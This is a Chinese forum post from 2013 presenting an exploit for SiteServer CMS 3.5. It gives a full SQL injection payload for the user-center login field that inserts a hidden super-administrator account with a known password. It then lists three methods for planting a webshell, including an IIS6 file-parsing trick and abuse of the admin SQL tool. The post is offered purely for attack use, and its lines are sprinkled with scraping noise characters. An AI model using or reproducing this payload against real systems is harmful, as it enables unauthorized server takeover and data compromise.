经测试秒杀最新的3.5版5 t. _# p: z7 {( b1 {
stieserver官网:www.siteserver.cn4 x) k! ^3 c) @6 h
EXP:3 k9 {9 n: N5 j1 N
直接访问UserCenter/login.aspx& y7 W' ?; `; L i. Q2 l q" K7 c
用户名处输入:) G) I( [' d, L9 ~# @/ s# f' F
+ C5 h7 }6 y( @8 _
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–2 w- E( U4 Z; V3 K
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。) M [4 P4 g* u# `8 e& `6 _- o; D
之后再访问后台SiteServer/login.aspx用插入的用户登陆3 X8 i- I0 @+ ~8 A5 {+ m6 B
后台拿webshell的三种方法:6 T! C" D! X, y( I
一、" u% V- M& u% M$ v1 b
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx2 d% T% a( y0 M; f. | N3 x. ?
二、0 G; {9 y' H4 L& e
成员权限-》添加用户-》用户名为:1.asp& R, T$ J' p+ E( q: z4 M
http://127.0.0.1/usercenter/
& Q. i) s* p) ]& o用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell# |# v, y, z9 Z# l$ _6 K/ r
(ps:后台添加用户时不会验证是否含有非法字符)
; e( k- m1 o% y+ s三、
' M0 l" d# s. m) F系统工具-》实用工具-》机器参数查看* U; A* u; J9 Q5 |# X! q# t8 p
可以看到数据库类型、名称,WEB路径! o4 \ o' D5 k3 i- ^( l8 h; Z
系统工具-》数据库工具-》SQL语句查询: Q5 Q. p& k7 |- A
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对